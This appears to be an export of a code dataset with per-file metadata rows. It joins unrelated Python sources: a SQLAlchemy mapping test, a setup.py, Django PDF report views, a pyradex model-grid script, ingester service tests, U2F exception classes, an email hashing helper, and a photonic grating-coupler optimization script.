Column('magazine_page_id', Integer, ForeignKey('magazine_page.page_id'), primary_key=True),
Column('titles', String(45), default=''),
)
page_size_table = Table('page_size', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('width', Integer),
Column('height', Integer),
Column('name', String(45), default=''),
)
def generate_round_trip_test(use_unions=False, use_joins=False):
def test_roundtrip(self):
publication_mapper = mapper(Publication, publication_table)
issue_mapper = mapper(Issue, issue_table, properties = {
'publication': relationship(Publication, backref=backref('issues', cascade="all, delete-orphan")),
})
location_name_mapper = mapper(LocationName, location_name_table)
location_mapper = mapper(Location, location_table, properties = {
'issue': relationship(Issue, backref=backref('locations', lazy='joined', cascade="all, delete-orphan")),
'_name': relationship(LocationName),
})
page_size_mapper = mapper(PageSize, page_size_table)
magazine_mapper = mapper(Magazine, magazine_table, properties = {
'location': relationship(Location, backref=backref('magazine', uselist=False)),
'size': relationship(PageSize),
})
if use_unions:
page_join = polymorphic_union(
{
'm': page_table.join(magazine_page_table),
'c': page_table.join(magazine_page_table).join(classified_page_table),
'p': page_table.select(page_table.c.type=='p'),
}, None, 'page_join')
page_mapper = mapper(Page, page_table, with_polymorphic=('*', page_join), polymorphic_on=page_join.c.type, polymorphic_identity='p')
elif use_joins:
page_join = page_table.outerjoin(magazine_page_table).outerjoin(classified_page_table)
page_mapper = mapper(Page, page_table, with_polymorphic=('*', page_join), polymorphic_on=page_table.c.type, polymorphic_identity='p')
else:
page_mapper = mapper(Page, page_table, polymorphic_on=page_table.c.type, polymorphic_identity='p')
if use_unions:
magazine_join = polymorphic_union(
{
'm': page_table.join(magazine_page_table),
'c': page_table.join(magazine_page_table).join(classified_page_table),
}, None, 'page_join')
magazine_page_mapper = mapper(MagazinePage, magazine_page_table, with_polymorphic=('*', magazine_join), inherits=page_mapper, polymorphic_identity='m', properties={
'magazine': relationship(Magazine, backref=backref('pages', order_by=magazine_join.c.page_no))
})
elif use_joins:
magazine_join = page_table.join(magazine_page_table).outerjoin(classified_page_table)
magazine_page_mapper = mapper(MagazinePage, magazine_page_table, with_polymorphic=('*', magazine_join), inherits=page_mapper, polymorphic_identity='m', properties={
'magazine': relationship(Magazine, backref=backref('pages', order_by=page_table.c.page_no))
})
else:
magazine_page_mapper = mapper(MagazinePage, magazine_page_table, inherits=page_mapper, polymorphic_identity='m', properties={
'magazine': relationship(Magazine, backref=backref('pages', order_by=page_table.c.page_no))
})
classified_page_mapper = mapper(ClassifiedPage,
classified_page_table,
inherits=magazine_page_mapper,
polymorphic_identity='c',
primary_key=[page_table.c.id])
session = create_session()
pub = Publication(name='Test')
issue = Issue(issue=46,publication=pub)
location = Location(ref='ABC',name='London',issue=issue)
page_size = PageSize(name='A4',width=210,height=297)
magazine = Magazine(location=location,size=page_size)
page = ClassifiedPage(magazine=magazine,page_no=1)
page2 = MagazinePage(magazine=magazine,page_no=2)
page3 = ClassifiedPage(magazine=magazine,page_no=3)
session.add(pub)
session.flush()
print [x for x in session]
session.expunge_all()
session.flush()
session.expunge_all()
p = session.query(Publication).filter(Publication.name=="Test").one()
print p.issues[0].locations[0].magazine.pages
print [page, page2, page3]
assert repr(p.issues[0].locations[0].magazine.pages) == repr([page, page2, page3]), repr(p.issues[0].locations[0].magazine.pages)
test_roundtrip = function_named(
test_roundtrip, "test_%s" % (not use_union and (use_joins and "joins" or "select") or "unions"))
setattr(MagazineTest, test_roundtrip.__name__, test_roundtrip)
for (use_union, use_join) in [(True, False), (False, True), (False, False)]:
generate_round_trip_test(use_union, use_join)
| mpl-2.0 | 106,685,178,715,532,510 | 41.254545 | 176 | 0.600796 | false | 3.771197 | true | false | false |
udemy-course/udemy | setup.py | 1 | 1468 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import codecs
import os
from udemy import __title__
from udemy import __version__
from udemy import __author__
from udemy import __email__
# from distutils.core import setup
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = '\n' + f.read()
setup(
name=__title__,
version=__version__,
author=__author__,
author_email=__email__,
description='My short description for my project. ',
long_description=long_description,
url='https://github.com/udemy-course/udemy',
packages=find_packages(exclude=('tests',)),
install_requires=['requests'],
entry_points='''
[console_scripts]
udemy-cli=udemy.cli:main
''',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'License :: OSI Approved :: ISC License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy']
)
| apache-2.0 | -1,127,698,628,932,444,200 | 30.234043 | 74 | 0.660763 | false | 3.725888 | false | false | false |
tnemisteam/cdf-steps | reports_basic/views.py | 3 | 10027 | from django.shortcuts import render
from django.views.generic import View
from baseapp.models import School,Block,Class_Studying,Academic_Year,District
from students.models import Child_detail
from django.template.loader import get_template
from django.template import Context
import cStringIO as StringIO
import xhtml2pdf.pisa as pisa
from django.http import HttpResponse, Http404
from django.core.paginator import Paginator, PageNotAnInteger
def render_to_pdf(template_src, context_dict, filename):
template = get_template(template_src)
context = Context(context_dict)
html = template.render(context)
result = StringIO.StringIO()
pdf = pisa.pisaDocument(
StringIO.StringIO(html.encode("UTF-8")), result, link_callback=fetch_resources)
if not pdf.err:
outfile = HttpResponse(result.getvalue(), mimetype="application/pdf")
outfile['Content-Disposition'] = 'attachment; filename=' + \
filename + '.pdf'
return outfile
return http.HttpResponse('We had some error on report generation<pre>%s</pre>' % cgi.escape(html))
def fetch_resources(uri, rel):
path = os.path.join(
settings.MEDIA_ROOT, uri.replace(settings.MEDIA_URL, ""))
return path
def download_child_profile(request,ch_id):
child = Child_detail.objects.get(id=ch_id)
pagesize = 'A4'
title = 'Child Profile'
return render_to_pdf('download_child_profile.html', locals(), 'Child_Profile')
class ReportViewBasic(View):
def get(self,request,**kwargs):
if request.user.account.user_category_id == 2 or request.user.account.user_category_id == 5:
school_list = School.objects.filter(block_id=request.user.account.associated_with).order_by('school_name')
return render(request,'report_list_basic.html',{'school_list':school_list})
elif request.user.account.user_category_id == 3 or request.user.account.user_category_id == 6 or request.user.account.user_category_id == 7 or request.user.account.user_category_id == 8 or request.user.account.user_category_id == 12 or request.user.account.user_category_id == 13 or request.user.account.user_category_id == 14:
block_list = Block.objects.filter(district_id=request.user.account.associated_with).order_by('block_name')
school_list = School.objects.filter(district_id=request.user.account.associated_with).order_by('school_name')
return render(request,'report_list_basic.html',{'school_list':school_list,'block_list':block_list})
elif request.user.account.user_category_id == 4 or request.user.account.user_category_id == 9 or request.user.account.user_category_id == 10 or request.user.account.user_category_id == 11 or request.user.account.user_category_id == 15 or request.user.account.user_category_id == 16 or request.user.account.user_category_id == 17:
district_list = District.objects.all().order_by('district_name')
block_list = Block.objects.all().order_by('block_name')
school_list = School.objects.all().order_by('school_name')
return render(request,'report_list_basic.html',{'school_list':school_list,'block_list':block_list,'district_list':district_list})
return render(request,'report_list_basic.html',locals())
def post(self,request,**kwargs):
if request.POST["class_studying"] == "all":
class_studying=request.POST["class_studying"]
if request.POST["class_studying"] == "all":
academic_year=request.POST["academic_year"]
if request.user.account.user_category_id == 2 or request.user.account.user_category_id == 5:
school_list = School.objects.filter(block_id=request.user.account.associated_with).order_by('school_name')
school_id = request.POST["school_list"]
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"])
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"],class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"],academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(school_id=request.POST["school_list"],class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
elif request.user.account.user_category_id == 3 or request.user.account.user_category_id == 6 or request.user.account.user_category_id == 7 or request.user.account.user_category_id == 8 or request.user.account.user_category_id == 12 or request.user.account.user_category_id == 13 or request.user.account.user_category_id == 14:
block_list = Block.objects.filter(district_id=request.user.account.associated_with).order_by('block_name')
school_list = School.objects.filter(district_id=request.user.account.associated_with).order_by('school_name')
school_id = request.POST["school_list"]
block_id = request.POST["block_list"]
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"])
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
elif request.user.account.user_category_id == 4 or request.user.account.user_category_id == 9 or request.user.account.user_category_id == 10 or request.user.account.user_category_id == 11 or request.user.account.user_category_id == 15 or request.user.account.user_category_id == 16 or request.user.account.user_category_id == 17:
district_list = District.objects.all().order_by('district_name')
block_list = Block.objects.all().order_by('block_name')
school_list = School.objects.all().order_by('school_name')
school_id = request.POST["school_list"]
block_id = request.POST["block_list"]
district_id = request.POST["district_list"]
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"])
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(block_id = request.POST["block_list"],school_id=request.POST["school_list"],class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
else:
school_id = request.user.account.associated_with
if request.POST["class_studying"] == 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=school_id)
elif request.POST["class_studying"] != 'all' and request.POST["academic_year"] == 'all':
student_detail = Child_detail.objects.filter(school_id=school_id,class_studying=request.POST["class_studying"])
elif request.POST["class_studying"] == 'all' and request.POST["academic_year"] != 'all':
student_detail = Child_detail.objects.filter(school_id=school_id,academic_year_id=request.POST["academic_year"])
else:
student_detail = Child_detail.objects.filter(school_id=school_id,class_studying=request.POST["class_studying"],academic_year_id=request.POST["academic_year"])
cls_stud = Class_Studying.objects.get(id=request.POST["class_studying"])
class_study = cls_stud.class_studying
acad_yr = Academic_Year.objects.get(id=request.POST["academic_year"])
aca_year = acad_yr.academic_year
schl_name = School.objects.get(id=school_id)
school_name = schl_name.school_name
return render_to_pdf('download_child_profile_basic.html',locals(),'Child_Profile')
pagesize = 'A4'
title = 'Child Profile'
return render(request,'report_list_basic.html',locals())
| mit | 535,483,344,508,277,800 | 79.216 | 337 | 0.675177 | false | 3.538109 | false | false | false |
low-sky/h2codumb | h2cogrids.py | 1 | 1560 | from astropy.table import Table
import pyradex
import numpy as np
R = pyradex.Radex(column=1e16,abundance=1e-4,species='ph2co-h2')
fortho = 0.75
nFWHM = 5
FHWMmin = 0.5
FHWMmx = 5
nDens = 21
nlower = 2
nupper = 6
nCol = 41
Nlower = 10
Nupper = 16
nTemp = 31
Tlower = 10
Tupper = 300
Temps = np.logspace(1,2.5,nTemp)
Cols = 1e1**np.linspace(Nlower,Nupper,nCol)
Densities = 1e1**(np.linspace(nlower,nupper,nDens))
FWHM = np.logspace(np.log10(0.5),np.log10(5),nFWHM)
outtable = Table(names = ['Tex_303_202','Tex_322_221','Tex_321_220',
'tau_303_202','tau_322_221','tau_321_220',
'Temperature','Column','nH2','FWHM'])
for T in Temps:
for N in Cols:
for n in Densities:
for dV in FWHM:
Tlvg = R(collider_densities={'oH2':n*fortho,'pH2':(1-fortho)*n}, column=N, abundance = 1e-9, species='ph2co-h2',temperature=T,deltav=dV)
outtable.add_row()
outtable[-1]['Tex_303_202'] = Tlvg[2]['Tex']
outtable[-1]['tau_303_202'] = Tlvg[2]['tau']
outtable[-1]['Tex_322_221'] = Tlvg[9]['Tex']
outtable[-1]['tau_322_221'] = Tlvg[9]['tau']
outtable[-1]['Tex_321_220'] = Tlvg[12]['Tex']
outtable[-1]['tau_321_220'] = Tlvg[12]['tau']
outtable[-1]['Temperature'] = T
outtable[-1]['Column'] = N
outtable[-1]['nH2'] = n
outtable[-1]['FWHM'] = dV
outtable.write('ph2cogrid.fits',format='fits',overwrite=True)
| gpl-2.0 | 6,030,501,892,111,791,000 | 28.433962 | 152 | 0.55 | false | 2.648557 | false | false | false |
jcu-eresearch/TDH-dc24-ingester-platform | dc24_ingester_platform/service/tests.py | 1 | 12960 | """This module tests the service CRUD functionality
"""
import unittest
import tempfile
import shutil
import datetime
from dc24_ingester_platform.service import ingesterdb, repodb
from jcudc24ingesterapi.models.locations import Region, Location
from jcudc24ingesterapi.models.dataset import Dataset
from jcudc24ingesterapi.schemas.data_entry_schemas import DataEntrySchema
from jcudc24ingesterapi.schemas.metadata_schemas import DatasetMetadataSchema, DataEntryMetadataSchema
from jcudc24ingesterapi.schemas.data_types import FileDataType, String, Double
from jcudc24ingesterapi.ingester_platform_api import UnitOfWork
from jcudc24ingesterapi.models.data_sources import PullDataSource,\
DatasetDataSource
from jcudc24ingesterapi.models.sampling import PeriodicSampling
from jcudc24ingesterapi.models.data_entry import DataEntry
from jcudc24ingesterapi.ingester_exceptions import InvalidObjectError,\
StaleObjectError, PersistenceError
class TestServiceModels(unittest.TestCase):
def setUp(self):
self.files = tempfile.mkdtemp()
self.repo = repodb.RepositoryDB({"db":"sqlite://", "files":self.files})
self.service = ingesterdb.IngesterServiceDB("sqlite://", self.repo)
def tearDown(self):
del self.service
del self.repo
shutil.rmtree(self.files)
def test_data_types(self):
schema1 = DatasetMetadataSchema("schema1")
schema1.addAttr(FileDataType("file"))
schema1a = self.service.persist(schema1)
self.assertEquals(1, len(schema1a.attrs))
schema2 = DataEntrySchema("schema2")
schema2.addAttr(FileDataType("file"))
schema2.addAttr(Double("x"))
schema2a = self.service.persist(schema2)
loc = Location(10.0, 11.0)
loca = self.service.persist(loc)
dataset = Dataset()
dataset.schema = schema1a.id
dataset.location = loca.id
# We've trying to use a dataset_metadata schema, so this should fail
self.assertRaises(ValueError, self.service.persist, dataset)
dataset.schema = schema2a.id
# Now we're using the correct type of schema
dataset1a = self.service.persist(dataset)
dataset1b = self.service.get_dataset(dataset1a.id)
self.assertEquals(dataset1a.id, dataset1b.id)
self.assertDictEqual(dataset1a.__dict__, dataset1b.__dict__)
# Update and add a data source
dataset1b.data_source = PullDataSource("http://www.abc.net.au", None, recursive=False, field="file", processing_script="TEST", sampling=PeriodicSampling(10000))
dataset1b.enabled = True
dataset1c = self.service.persist(dataset1b)
self.assertNotEqual(None, dataset1c.data_source)
self.assertEqual("TEST", dataset1c.data_source.processing_script)
self.assertNotEqual(None, dataset1c.data_source.sampling)
datasets = self.service.get_active_datasets()
self.assertEquals(1, len(datasets))
self.assertNotEqual(None, datasets[0].data_source)
self.assertEqual("TEST", datasets[0].data_source.processing_script)
self.assertNotEqual(None, datasets[0].data_source.sampling)
# Test with criteria
datasets = self.service.get_active_datasets(kind="pull_data_source")
self.assertEquals(1, len(datasets))
datasets = self.service.get_active_datasets(kind="push_data_source")
self.assertEquals(0, len(datasets))
schema1b = self.service.get_schema(schema1a.id)
self.assertEquals(schema1a.id, schema1b.id)
datasets = self.service.search("dataset")
self.assertEquals(1, len(datasets))
schemas = self.service.search("data_entry_schema")
self.assertEquals(1, len(schemas))
schemas = self.service.search("dataset_metadata_schema")
self.assertEquals(1, len(schemas))
locs = self.service.search("location")
self.assertEquals(1, len(locs))
# Test ingest
data_entry_1 = DataEntry(dataset1b.id, datetime.datetime.now())
data_entry_1['x'] = 27.8
data_entry_1 = self.service.persist(data_entry_1)
self.assertIsNotNone(data_entry_1.id)
def test_region(self):
#{"class":"region", "name": "Region1", "region_points":[(1, 1), (1, 2)]}
region1 = Region("Region 1")
region1.region_points = [(1, 1), (1, 2)]
region1a = self.service.persist(region1)
self.assertEqual(2, len(region1a.region_points), "Not 2 region points")
# def test_unit(self):
# unit = {"insert":[{"id":-2, "class":"dataset", "location":-1, "schema": -3, "data_source":{"class":"test", "param1":"1", "param2":"2"}, "sampling":{"class":"schedule1", "param1":"1", "param2":"2"}},
# {"id":-1, "latitude":30, "longitude": 20, "class":"location"},
# {"id":-3, "attributes":[{"name":"file", "class":"file"}], "class":"data_entry_schema"}], "delete":[], "update":[], "enable":[], "disable":[]}
# unit2 = self.service.commit(unit, None)
# for obj in unit2:
# if obj["class"] == "location":
# self.assertEquals(obj["correlationid"], -1)
# elif obj["class"] == "dataset":
# self.assertEquals(obj["correlationid"], -2)
def test_schema_persistence(self):
"""This test creates a simple schema hierarchy, and tests updates, etc"""
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
schema1 = self.service.persist(schema1)
self.assertGreater(schema1.id, 0, "ID does not appear valid")
self.assertEquals(1, len(schema1.attrs))
schema2 = DataEntrySchema("child1")
schema2.addAttr(FileDataType("file2"))
schema2.extends.append(schema1.id)
schema2 = self.service.persist(schema2)
self.assertGreater(schema2.id, 0, "ID does not appear valid")
self.assertEquals(1, len(schema2.attrs))
self.assertEquals("file2", schema2.attrs["file2"].name)
def test_schema_persistence_unit(self):
"""This test creates a simple schema hierarchy, and tests updates, etc"""
unit = UnitOfWork(None)
ids = []
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
ids.append(unit.post(schema1))
schema2 = DataEntrySchema("child1")
schema2.addAttr(FileDataType("file2"))
schema2.extends.append(schema1.id)
ids.append(unit.post(schema2))
ret = self.service.commit(unit, None)
for obj in ret:
self.assertGreater(obj.id, 0)
self.assertIn(obj.correlationid, ids)
def test_schema_persistence_clash(self):
"""This test creates a simple schema hierarchy, that has a field name clash"""
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
schema1 = self.service.persist(schema1)
self.assertGreater(schema1.id, 0, "ID does not appear valid")
self.assertEquals(1, len(schema1.attrs))
schema2 = DataEntrySchema("child1")
schema2.addAttr(FileDataType("file"))
schema2.extends.append(schema1.id)
self.assertRaises(PersistenceError, self.service.persist, schema2)
def test_state_persistence(self):
"""Test that the state of samplers and data sources can be persisted."""
sampler_state = self.service.get_sampler_state(1)
self.assertEquals(0, len(sampler_state))
self.service.persist_sampler_state(1, {"test":"abc","test2":123})
sampler_state = self.service.get_sampler_state(1)
self.assertEquals(2, len(sampler_state))
self.assertEquals("abc", sampler_state["test"])
self.assertEquals("123", sampler_state["test2"])
del sampler_state["test"]
sampler_state["test2"] = "xyz"
self.service.persist_sampler_state(1, sampler_state)
sampler_state = self.service.get_sampler_state(1)
self.assertEquals(1, len(sampler_state))
self.assertEquals("xyz", sampler_state["test2"])
# Now test the same thing on the data source state
data_source_state = self.service.get_data_source_state(1)
self.assertEquals(0, len(data_source_state))
self.service.persist_data_source_state(1, {"test":"abc","test2":123})
data_source_state = self.service.get_data_source_state(1)
self.assertEquals(2, len(data_source_state))
self.assertEquals("abc", data_source_state["test"])
self.assertEquals("123", data_source_state["test2"])
del data_source_state["test"]
data_source_state["test2"] = "xyz"
self.service.persist_data_source_state(1, data_source_state)
data_source_state = self.service.get_data_source_state(1)
self.assertEquals(1, len(data_source_state))
self.assertEquals("xyz", data_source_state["test2"])
def test_dataset_data_source_unit(self):
"""This test creates a simple schema hierarchy, and tests updates, etc"""
unit = UnitOfWork(None)
schema1 = DataEntrySchema("base1")
schema1.addAttr(FileDataType("file"))
schema_id = unit.post(schema1)
loc = Location(10.0, 11.0)
loc.name = "Location"
loc_id = unit.post(loc)
dataset1 = Dataset()
dataset1.schema = schema_id
dataset1.location = loc_id
dataset1_id = unit.post(dataset1)
dataset2 = Dataset()
dataset2.schema = schema_id
dataset2.location = loc_id
dataset2.data_source = DatasetDataSource(dataset1_id, "")
dataset2_id = unit.post(dataset2)
ret = self.service.commit(unit, None)
found = False
for r in ret:
if isinstance(r, Dataset) and dataset1_id == r.correlationid:
dataset1_id = r.id
elif isinstance(r, Dataset) and dataset2_id == r.correlationid:
self.assertEquals(dataset1_id, r.data_source.dataset_id, "Data source dataset_id was not updated")
found = True
self.assertTrue(found, "Didn't find the dataset with the dataset data source")
def test_region_persist(self):
"""Test that the region persists correctly, including version numbering, and that
region points are correctly updated"""
region = Region("Region 1")
region.region_points = [(1, 1), (1, 2)]
region1 = self.service.persist(region)
self.assertEquals(1, region1.version)
region1.version = 0
self.assertRaises(StaleObjectError, self.service.persist, region1)
region1.version = 1
region1.region_points = [(99,100)]
region2 = self.service.persist(region1)
self.assertEquals(2, region2.version)
self.assertEquals(1, len(region2.region_points))
self.assertEquals((99, 100), region2.region_points[0])
def test_location_persist(self):
loc = Location(10.0, 11.0)
loc.name = "Location"
loc1 = self.service.persist(loc)
self.assertEquals(1, loc1.version)
loc1.version = 0
self.assertRaises(StaleObjectError, self.service.persist, loc1)
loc1.version = 1
loc2 = self.service.persist(loc1)
self.assertEquals(2, loc2.version)
def test_schema_persist(self):
schema = DataEntrySchema("base1")
schema.addAttr(FileDataType("file"))
schema1 = self.service.persist(schema)
self.assertEquals(1, schema1.version)
schema1.version = 0
self.assertRaises(PersistenceError, self.service.persist, schema1)
schema1.version = 1
self.assertRaises(PersistenceError, self.service.persist, schema1)
def test_dataset_persist(self):
schema = DataEntrySchema("base1")
schema.addAttr(FileDataType("file"))
schema = self.service.persist(schema)
loc = Location(10.0, 11.0)
loc.name = "Location"
loc = self.service.persist(loc)
dataset = Dataset()
dataset.schema = schema.id
dataset.location = loc.id
dataset1 = self.service.persist(dataset)
self.assertEquals(1, dataset1.version)
dataset1.version = 0
self.assertRaises(StaleObjectError, self.service.persist, dataset1)
dataset1.version = 1
dataset2 = self.service.persist(dataset1)
self.assertEquals(2, dataset2.version)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 1,280,707,658,308,624,400 | 40.672026 | 208 | 0.624074 | false | 3.866348 | true | false | false |
Yubico/u2fval | u2fval/exc.py | 1 | 1977 | # Copyright (c) 2014 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__all__ = [
'U2fException',
'BadInputException',
'NoEligibleDevicesException',
'DeviceCompromisedException'
]
class U2fException(Exception):
status_code = 400
code = -1
def __init__(self, message, data=None):
super(U2fException, self).__init__(message, data)
self.message = message
self.data = data
class BadInputException(U2fException):
code = 10
class NotFoundException(BadInputException):
status_code = 404
class NoEligibleDevicesException(U2fException):
code = 11
class DeviceCompromisedException(U2fException):
code = 12
| bsd-2-clause | -4,314,260,985,684,125,700 | 32.508475 | 71 | 0.738998 | false | 4.242489 | false | false | false |
jack51706/Maildb | core/hashing.py | 2 | 1225 | #!/usr/bin/env python
'''
Copyright (C) 2012-2013 Kevin Breen.
This file is part of the Maildb web application
See the 'LICENSE' File for copying permission.
'''
# All The Hashing Functions will be in here somewhere
import os
import sys
import hashlib
from core.common import Dictionary
class MailHash():
def HashMD5(self, part_data): #Generate the md5
md5_hash = hashlib.md5()
md5_hash.update(part_data)
return md5_hash.hexdigest()
def HashSha1(self, part_data): # Generate the SHA1
sha1_hash = hashlib.sha1()
sha1_hash.update(part_data)
return sha1_hash.hexdigest()
def HashSha256(self, part_data): # Generate the SHA 256
sha256_hash = hashlib.sha256()
sha256_hash.update(part_data)
return sha256_hash.hexdigest()
def HashSha512(self, part_data): # Generate the Sha512
sha512_hash = hashlib.sha512()
sha512_hash.update(part_data)
return sha512_hash.hexdigest()
def Hashssdeep(self, part_data):
import ssdeep
deep = ssdeep.hash(part_data)
return deep
def fileMD5(self, filePath):
fh = open(filePath, 'rb')
m = hashlib.md5()
while True:
data = fh.read(8192)
if not data:
break
m.update(data)
return m.hexdigest()
| gpl-3.0 | -4,344,832,424,352,688,600 | 14.705128 | 56 | 0.688163 | false | 3.002451 | false | false | false |
stanfordnqp/spins-b | examples/invdes/grating_coupler/grating.py | 1 | 25229 | """2D fiber-to-chip grating coupler optimization code.
This is a simple spins example that optimizes a fiber-to-chip grating coupler
for the SOI platform. See Su et al. Optics Express (2018) for details.
To run an optimization:
$ python3 grating.py run save-folder
To view results:
$ python3 grating.py view save-folder
To see optimization status quickly:
$ python3 grating.py view_quick save-folder
To resume an optimization:
$ python3 grating.py resume save-folder
To generate a GDS file of the grating:
$ python3 grating.py gen_gds save-folder
"""
import os
import pickle
import shutil
import gdspy
import numpy as np
from typing import List, NamedTuple, Tuple
# `spins.invdes.problem_graph` contains the high-level spins code.
from spins.invdes import problem_graph
# Import module for handling processing optimization logs.
from spins.invdes.problem_graph import log_tools
# `spins.invdes.problem_graph.optplan` contains the optimization plan schema.
from spins.invdes.problem_graph import optplan
from spins.invdes.problem_graph import workspace
# If `True`, also minimize the back-reflection.
MINIMIZE_BACKREFLECTION = False
# If 'True`, runs an additional `cont_iters' of continuous optimization with
# discreteness permittivity biasing penalty added.
# Fine-tuning the `intial_value' of `disc_scaling may be necessary depending
# on application and the number of wavelengths optimized.
DISCRETENESS_PENALTY = True
def run_opt(save_folder: str, grating_len: float, wg_width: float) -> None:
"""Main optimization script.
This function setups the optimization and executes it.
Args:
save_folder: Location to save the optimization data.
"""
os.makedirs(save_folder)
wg_thickness = 220
sim_space = create_sim_space(
"sim_fg.gds",
"sim_bg.gds",
grating_len=grating_len,
box_thickness=2000,
wg_thickness=wg_thickness,
etch_frac=0.5,
wg_width=wg_width)
obj, monitors = create_objective(
sim_space, wg_thickness=wg_thickness, grating_len=grating_len)
trans_list = create_transformations(
obj, monitors, 50, 200, sim_space, min_feature=80)
plan = optplan.OptimizationPlan(transformations=trans_list)
# Save the optimization plan so we have an exact record of all the
# parameters.
with open(os.path.join(save_folder, "optplan.json"), "w") as fp:
fp.write(optplan.dumps(plan))
# Copy over the GDS files.
shutil.copyfile("sim_fg.gds", os.path.join(save_folder, "sim_fg.gds"))
shutil.copyfile("sim_bg.gds", os.path.join(save_folder, "sim_bg.gds"))
# Execute the optimization and indicate that the current folder (".") is
# the project folder. The project folder is the root folder for any
# auxiliary files (e.g. GDS files).
problem_graph.run_plan(plan, ".", save_folder=save_folder)
# Generate the GDS file.
gen_gds(save_folder, grating_len, wg_width)
def create_sim_space(
gds_fg_name: str,
gds_bg_name: str,
grating_len: float = 12000,
etch_frac: float = 0.5,
box_thickness: float = 2000,
wg_width: float = 12000,
wg_thickness: float = 220,
buffer_len: float = 1500,
dx: int = 40,
num_pmls: int = 10,
visualize: bool = False,
) -> optplan.SimulationSpace:
"""Creates the simulation space.
The simulation space contains information about the boundary conditions,
gridding, and design region of the simulation.
Args:
gds_fg_name: Location to save foreground GDS.
gds_bg_name: Location to save background GDS.
grating_len: Length of the grating coupler and design region.
etch_frac: Etch fraction of the grating. 1.0 indicates a fully-etched
grating.
box_thickness: Thickness of BOX layer in nm.
wg_thickness: Thickness of the waveguide.
wg_width: Width of the waveguide.
buffer_len: Buffer distance to put between grating and the end of the
simulation region. This excludes PMLs.
dx: Grid spacing to use.
num_pmls: Number of PML layers to use on each side.
visualize: If `True`, draws the polygons of the GDS file.
Returns:
A `SimulationSpace` description.
"""
# Calculate the simulation size, including PMLs
sim_size = [
grating_len + 2 * buffer_len + dx * num_pmls,
wg_width + 2 * buffer_len + dx * num_pmls
]
# First, we use `gdspy` to draw the waveguides and shapes that we would
# like to use. Instead of programmatically generating a GDS file using
# `gdspy`, we could also simply provide a GDS file (e.g. drawn using
# KLayout).
